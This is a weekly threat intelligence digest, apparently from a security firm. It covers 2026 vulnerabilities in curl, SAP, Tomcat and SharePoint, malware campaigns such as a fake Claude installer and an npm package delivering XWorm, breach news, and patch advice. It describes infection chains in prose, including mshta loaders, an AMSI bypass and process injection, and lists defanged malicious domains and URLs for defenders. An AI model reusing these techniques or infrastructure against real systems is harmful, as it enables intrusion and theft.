Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Alleged PoC for CVE-2026-3805, High-Severity UAF Vulnerability Affecting Curl - On 12th April 2026, a GitHub user known as Rat5ak published an alleged proof-of-concept (PoC) exploit for CVE-2026-3805, a high-severity Use-After-Free (UAF) vulnerability affecting curl versions 8.13.0 through to 8.18.0. Curl is a widely used open-source command-line tool and library for transferring data across multiple protocols, including HTTP, HTTPS, FTP, and SMB. The vulnerability was addressed on 11th March 2026 with the release of curl version 8.19.0.
SAP Patches CVE-2026-27681 Critical SQL Injection Vulnerability in Business Planning and Consolidation and Business Warehouse - On 14th April 2026, SAP patched 20 vulnerabilities, including CVE-2026-27681, a critical vulnerability with a severity score of 9.9 affecting SAP Business Planning and Consolidation and SAP Business Warehouse. The affected versions include HANABPC 810, BPC4HANA 300, and SAP_BW 750, 752 to 758, and 816. At the time of writing, there are no publicly reported cases of active exploitation.
CVE-2026-27681 is an SQL injection vulnerability that could lead to arbitrary code execution. The issue exists because a low-privileged user is able to upload a file containing SQL statements, which are then executed by a vulnerable ABAP program.
Researcher Discloses CVE-2026-34486 Apache Tomcat Tribes Vulnerability - On 9th April 2026, the Apache Software Foundation patched CVE-2026-34486, a vulnerability affecting Apache Tomcat versions 11.0.20, 10.1.53, and 9.0.116. The issue was resolved in versions 11.0.21, 10.1.54, and 9.0.117. It is also recommended to restrict access to the Tribes receiver port (default TCP/4000) to trusted hosts and to monitor logs for suspicious decryption failures. At the time of writing, there are no publicly reported cases of active exploitation.
CVE-2026-34486 is a security control bypass and deserialisation vulnerability that may allow threat actors to achieve unauthenticated remote code execution due to a regression in the EncryptInterceptor within Tomcat Tribes clustering. A control flow error causes decryption failures to fail open, meaning attacker-supplied data may still be processed even when cryptographic validation fails. Successful exploitation could result in malicious data reaching a Java deserialisation pathway, potentially leading to arbitrary code execution.
Potential Threats
Threat Actors Use ClickFix Technique in Claude AI Installer Campaign to Deliver Information Stealer - On 16th April 2026, Rapid7 reported a social engineering campaign targeting individuals across the US and the European Union to deliver a multi-stage infection chain. Threat actors distributed an installer posing as a legitimate Claude AI tool and used ClickFix techniques to trick users into initiating the infection. While the final payload was not disclosed, it is likely to be an information stealer capable of collecting sensitive data from compromised Windows systems.
The attack began with a malicious installer hosted on spoofed domains. Victims were prompted to run a command via the Windows Run utility, launching mshta to retrieve a malicious MSIX bundle containing an HTA script. This executed obfuscated Visual Basic and an encoded PowerShell command, which downloaded a secondary script and bypassed AMSI in memory. The activity then progressed through obfuscated PowerShell execution, ultimately decrypting shellcode and using process injection to run the final payload.
Malicious NPM Package and Fake Game Delivers XWorm - On 15th April 2026, JFrog Security reported a supply chain compromise involving a malicious npm package and a fake video game used to distribute XWorm. XWorm is a .NET-based remote access trojan that enables full remote control, data exfiltration, and execution of arbitrary commands on infected systems.
The campaign uses two primary delivery methods: a malicious npm package and a fake game named Astral Warfare. The npm package abuses preinstall hooks to automatically execute a malicious script during installation and also triggers execution when imported, ensuring multiple execution paths. This script downloads and runs a batch file via the Windows Command Prompt.
In parallel, threat actors use compromised Discord accounts to trick victims into downloading a malicious archive containing a fake game executable. This dropper reconstructs an encoded payload, writes a batch script similar to the npm-delivered variant, and executes it, continuing the infection chain.
Gentlemen RaaS Affiliate Uses SystemBC and Multi-Stage Tooling for Enterprise-Wide Compromise - On 20th April 2026, cybersecurity firm Check Point Research published a technical analysis of a Gentlemen ransomware-as-a-service operation conducted by an affiliate using the SystemBC proxy malware. Gentlemen is a multi-platform ransomware family written primarily in Go, supporting Windows, Linux, NAS, BSD, and ESXi environments, enabling large-scale enterprise attacks. According to the report, the campaign combines the use of SystemBC, Cobalt Strike, and a structured lateral movement framework to achieve full enterprise compromise.
Based on the analysis, the attack chain begins with the threat actor already present on a Domain Controller with Domain Administrator privileges, although the initial access vector has not been disclosed. From this position, the threat actor validates credentials and moves laterally across the environment.
General News
Over 1,300 Microsoft SharePoint servers vulnerable to spoofing attacks - Over 1,300 internet-facing Microsoft SharePoint servers remain unpatched against CVE-2026-32201, a spoofing vulnerability that was previously exploited as a zero-day and continues to be abused in ongoing attacks. The flaw affects SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition.
Microsoft addressed the issue as part of its April 2026 Patch Tuesday, noting that successful exploitation allows unauthenticated threat actors to perform network spoofing due to improper input validation. This may enable attackers to access sensitive information and modify data, although it does not impact availability. The attack requires low complexity and no user interaction, increasing its risk profile.
Although Microsoft confirmed active exploitation, it has not disclosed further details regarding the attack methods or attributed the activity to a specific threat actor. Security monitoring has since identified that a significant number of exposed systems remain unpatched, with only limited remediation observed following the release of security updates.
Cloud platform Vercel says company breached through third-party AI tool - On 20th April 2026, the widely used cloud platform Vercel disclosed a cyber incident in which threat actors gained unauthorised access to internal systems via a compromised third-party AI tool. The attacker claimed access to internal databases and multiple employee accounts, raising concerns around potential supply chain risks involving widely used libraries. Vercel confirmed that a limited subset of customer credentials had been exposed and advised affected users to rotate their credentials immediately. At the time of writing, the full scope of impact remains under investigation.
The breach was traced to the compromise of a third-party AI tool used by an employee, which enabled the attacker to take over the employee’s Google Workspace account and access certain internal environments and non-sensitive environment variables. While sensitive variables were reportedly protected, exposed tokens and configuration data may still pose a risk if not rotated. Further investigation revealed the initial compromise may be linked to an earlier incident involving stolen OAuth tokens and possible infostealer activity. External incident response support has been engaged, and law enforcement has been notified.
Apple account change alerts abused to send phishing emails - Scammers are abusing Apple's legitimate account change notification system to deliver phishing emails that bypass spam filters and pass SPF, DKIM, and DMARC authentication checks. The attack works by creating an Apple ID and embedding phishing text, such as a fake $899 iPhone purchase via PayPal with a callback phone number, into the first and last name fields of the account. When the attacker then modifies the shipping information, Apple automatically sends a security alert that includes the malicious text directly within the legitimate email, originating from Apple's own mail infrastructure (appleid@id.apple.com). The emails appear to be sent to an iCloud address tied to the attacker's account, but header analysis suggests a mailing list is used to distribute them to multiple real targets.
The goal of the campaign is to scare recipients into calling the included "support" number, where scammers impersonate Apple staff and attempt to trick victims into installing remote access software or handing over financial details, which in past campaigns has led to stolen funds, malware deployment, or data theft. This technique mirrors an earlier scheme that abused iCloud Calendar invites in the same way, highlighting how attackers increasingly exploit trusted platform features rather than spoofing them. BleepingComputer reported the abuse to Apple but received no response, and the technique reportedly still works, so users are advised to treat unexpected purchase alerts or callback requests with skepticism, even when they appear to come from genuine Apple infrastructure.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| BlueCharlie | ● Moderate | → | ● Moderate | ● 53 | → | ● 55 | ● 25 | → | ● 25 |
| UAT-10362 | NEW | → | ● Basic | NEW | → | ● 30 | NEW | → | ● 25 |
| TiMc Ransomware Group | NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ● 5 |
| Krybit Ransomware Group | ● Basic | → | ● Basic | ● 25 | → | ● 25 | ● 25 | → | ● 40 |
| miyako |
● Basic | → | ● Basic | ● 30 | → | ● 40 | ● 35 | → | ● 35 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | |||||
|---|---|---|---|---|---|---|---|---|
| ShinyHunters | ▲ | JanelaRAT | ▲ | CVE-2026-32201 | ▲ | Booking.com | ▲ | |
| Hanzal | ▲ | Adwind | ▲ | CVE-2026-34621 | ▲ | Take-Two Interactive | ▲ | |
| Exitium | ▲ | JanaWare Ransomware | ▲ | CVE-2026-33825 | ▲ | Rockstar Games | ▲ | |
| Russian Hackers | ▲ |
ProxyShell |
▲ | CVE-2025-0520 | ▲ | Basic-Fit | ▲ | |
| UNC1069 | ▲ | Backdoor | ▲ | CVE-2026-26980 | ▲ | Kraken | ▲ | |
Prominent Information Security Events
Threat Actors Use ClickFix Technique in Claude AI Installer Campaign to Deliver Information Stealer
Source: Insikt Group | Validated Intelligence Event
IOC: Domain - download[.]get-version[.]com
IOC: Domain - oakenfjrod[.]ru
IOC: Hash - 2b99ade9224add2ce86eb836dcf70040315f6dc95e772ea98f24a30cdf4fdb97
On 16th April 2026, Rapid7 reported that threat actors conducted a social engineering campaign targeting individuals across the US and the European Union to initiate a multi-stage infection chain. The attackers distributed an installer masquerading as a legitimate Claude AI tool and used ClickFix techniques to trick victims into initiating the infection. At the time of writing, the final stage malware payload had not been disclosed, although it is assessed to likely be an information stealer capable of collecting sensitive data from compromised Windows systems.
The attack chain began with a malicious Claude AI installer hosted on spoofed domains. After downloading the tool, victims were prompted to execute a command via the Windows Run utility, which launched mshta to retrieve a malicious MSIX bundle. This file contained an embedded HTA script that executed obfuscated Visual Basic code and launched an encoded PowerShell command. The PowerShell then retrieved a secondary script and bypassed the Antimalware Scan Interface by modifying in-memory structures.
The activity progressed through multiple layers of obfuscated PowerShell executed in memory. In the final stage, the script decrypted shellcode and performed process injection using Windows API calls to execute the final payload, commonly associated with information-stealing malware.
Malicious NPM Package and Fake Game Delivers XWorm
Source: Insikt Group | Validated Intelligence Event
IOC: URL - hxxps[:]//astralwarfare[.]fr/Astral_Warfare[.]rar
IOC: URL - hxxps[:]//astralwarfare[.]fr/script[.]bat
IOC: IP- 185[.]94[.]29[.]43
On 15th April 2026, JFrog Security reported a supply chain compromise involving a malicious npm package and a fake video game used to distribute XWorm. XWorm is a .NET-based remote access trojan that enables full remote control of infected systems, including command execution, surveillance, and data exfiltration. The campaign demonstrates a dual-delivery approach, targeting both developers through package ecosystems and general users through social engineering.
According to the analysis, the attack chain begins with two primary vectors: a malicious npm package and a fake game named Astral Warfare. The npm package abuses preinstall hooks to automatically execute a malicious script during installation and also ensures execution when imported, providing multiple opportunities for code execution. This script retrieves a batch file from attacker-controlled infrastructure and executes it via the Windows Command Prompt, establishing the next stage of the infection chain.
In parallel, threat actors leverage compromised Discord accounts to socially engineer users into downloading a malicious archive posing as the Astral Warfare game. The included executable acts as a dropper, reconstructing an encoded payload and writing a batch script similar to the npm-delivered variant. It then executes the script using standard Windows execution methods, continuing the infection process. Both delivery paths ultimately converge on the same payload execution mechanism, indicating a coordinated effort to maximise infection success across different user groups.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
-
CVE-2026-3805 (curl) – This vulnerability can be remediated by updating curl to version 8.19.0.
-
CVE-2026-27681 (SAP Business Planning and Consolidation / Business Warehouse) – This vulnerability can be remediated by applying the latest SAP security patches for affected versions (HANABPC 810, BPC4HANA 300, and SAP_BW 750, 752–758, 816).
-
CVE-2026-34486 (Apache Tomcat) – This vulnerability can be remediated by updating Apache Tomcat to versions 11.0.21, 10.1.54, or 9.0.117, and restricting access to the Tribes receiver port (TCP/4000) to trusted hosts.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.